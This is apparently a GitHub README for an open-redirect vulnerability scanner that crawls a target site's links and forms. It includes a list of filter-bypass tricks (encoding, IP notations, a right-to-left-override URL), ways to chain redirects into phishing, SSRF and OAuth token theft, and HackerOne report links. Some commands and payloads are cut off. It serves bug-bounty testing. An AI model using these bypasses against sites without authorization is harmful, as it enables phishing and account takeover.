After Golismero project got dead there is no more any up to date open-source tool that can collect links with parametrs and web-forms and then test them, so i decided to write one by my own. At the first step this tool does collect all the entry-points for the target website and then tryes to find open redirect vulnerability.

Why this project is better than other open-redirect scanners? It does recursevely crawl all the links from the target website and finds potential vulnerable web-forms by itself instead of using CommonCrawl or getting links list from user input. In the future i will probably add more modules to fuzz for SQL Injections and XSS.


~$ git clone
~$ pip3 install -r requirements.txt


~$ python3.8 -u
~$ python3.8 -u -c 'Cookie: user=admin'

After running you will also find newly created files with interesting links and all website entry-points.


• Try using the same parameter twice: ?
• If periods filtered, use an IPv4 address in decimal notation
• Try a double-URL and triple-URL encoded version of payloads
• Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
• For XSS, try replacing alert(1) with prompt(1) & confirm(1)
• If extension checked, try ?image_url={payload}/.jpg
• Try (or [any_param] If it redirects to, then it’s vulnerable! and are different domains.
• Use /U+e280 RIGHT-TO-LEFT OVERRIDE: https://[email protected]%E2%80%[email protected]
—— The unicode character U+202E changes all subsequent text to be right-to-left
—— E.g.:


• Phishing
• Chaining open redirect with
— • SSRF
— • OAuth token disclosure
— • XSS
— • CRLF injection

Open redirect writeups

Hackerone report 158434: Open Redirect & XSS on Shopify, $1,000
Hackerone report 101962: Open Redirect on Shopify, $500
Hackerone report 55546: Open Redirect on Shopify, $500
Hackerone report 55525: Open Redirect on Shopify, $500
Hackerone report 169759: Open Redirect on Shopify, $500
Hackerone report 160047: Open Redirect on Shopify, $500
Hackerone report 103772: Open Redirect on Shopify, $500
Hackerone report 159522: Open Redirect on Shopify, $500


View Github